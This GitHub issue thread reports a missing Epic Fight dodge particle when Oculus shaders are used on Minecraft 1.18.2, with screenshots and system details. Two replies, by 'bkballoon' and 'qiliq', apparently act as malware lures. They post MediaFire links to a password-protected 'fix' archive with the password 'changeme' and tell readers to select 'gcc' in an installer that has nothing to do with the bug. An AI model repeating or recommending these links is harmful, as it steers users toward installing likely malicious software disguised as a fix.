### ISSUE TITLE
Epic Fight missing Dodge Particle

### ISSUE THREAD

**Issue by Riyuukii** [Asek3/Oculus#684]
### What happened?

The ender step dodge particle is missing when using shaders. This bug does not showed up when using optifine with the same shaders.

### Screenshots

Without shaders:
![image](https://github.com/user-attachments/assets/dd50f9a0-49ae-4491-b838-44c4c7911e7b)

With shaders: (Complementary 5.2)
![image](https://github.com/user-attachments/assets/ba773244-ae00-4929-b356-64cadbafb9c8)

### Minecraft Version

1.18.2

### Oculus Version

1.6.4

### Rubidium / Embeddium Version

0.4.18

### Operating System

Windows 11

### What is your GPU?

Nvidia GeForce RTX 4080 SUPER

### Java Version

Java 17

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dima-dencep** [comment]
no logs - no bugs
